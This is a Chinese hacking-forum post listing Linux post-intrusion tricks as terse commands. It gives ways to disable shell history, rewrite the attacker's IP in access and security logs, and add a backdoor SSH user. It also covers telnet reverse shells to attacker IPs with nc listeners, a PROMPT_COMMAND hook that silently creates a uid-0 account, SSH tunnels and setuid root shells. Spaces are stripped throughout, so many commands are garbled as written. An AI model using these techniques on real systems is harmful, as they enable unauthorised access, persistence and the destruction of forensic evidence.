Linux入侵一些技巧性知识

[复制链接]
查看382 | 回复0 | 2012-4-1 19:16:35 | 显示全部楼层 |阅读模式
1.登录ssh之后不记录history
unsetHISTORYHISTFILEHISTSAVEHISTZONEHISTORYHISTLOG;exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=0


2.sed的一些邪恶用法

邪恶的替换到登录的IP和日志里的访问IP
sed-s’s/211.xxx.xxx.xxx/192.168.1.1/g’access_logaccess.logsecurity
邪恶的添加ssh限制登录的用户
sed-i’s/AllowUser单机传奇uckrootoracle/AllowUser单机传奇uckrootoraclerqcuser/g’sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof-i:22查找sshd的进程ID

COMMANDPIDUSERFDTYPEDEVICESIZENODENAME

sshd18662root11uIPv627925867TCP*:ssh(LISTEN)

sshd31793sshd12uIPv634742994TCP192.168.1.2:ssh->192.168.1.5:49080(ESTABLISHED)

然后

kill-SIGHUP18662
 
3.通过webshell反弹shell回来之后获取真正的ttyshell
python-c‘importpty;pty.spawn(“/bin/sh”)’

另外一种获取ttyshell的方法

$catsh.exp

#!/usr/bin/expect

#Spawnashell,thenallowtheusertointeractwithit.

#ThenewshellwillhaveagoodenoughTTYtoruntoolslikessh,suandlogin

spawnsh

interact

bashsh.exp
 
4.通过TELNET进行反向连接:
telnet[attacker_ipaddr][port1]/bin/bashtelnet[attacker_ipaddr][port2]

telnet210.51.173.418080/bin/bashtelnet210.51.173.418081

/usr/bin/telnet203.93.28.2368000/bin/bash/usr/bin/telnet203.93.28.2368001

在203.93.28.236上面运行:

nc–l–p8000

nc–l–p8001

/usr/bin/telnet192.168.1.1008088/bin/bash/usr/bin/telnet192.168.1.1008089
 
5.curldownload
Thefullcommandshouldlooksomethinglikethis:

curl-C–-Ohttp://www.mirror.com/path/to/NeoOffice-Patch.dmg
 
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unaliasls
 
7.linux的BASH提权
exportPROMPT_COMMAND=”/usr/sbin/useradd-o-u0kkoo&>/dev/null&&echokkoo:123456/usr/sbin/chpasswd&>/dev/null&&unsetPROMPT_COMMAND”
 
8.sshtunnel
ssh-C-f-N-g-Llisten_portST_HostST_portuser@Tunnel_Host

ssh-C-f-N-g-Rlisten_portST_HostST_portuser@Tunnel_Host

ssh-C-f-N-g-Dlisten_portuser@Tunnel_Host-f
 
9.本地rootshell
bash和tcsh是行不通的,其他的ashbshzshksh均可。具体操作比较简单,大概说一下cp/bin/ksh.;chownroot.rootksh;chmod4755ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个操作。
 
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则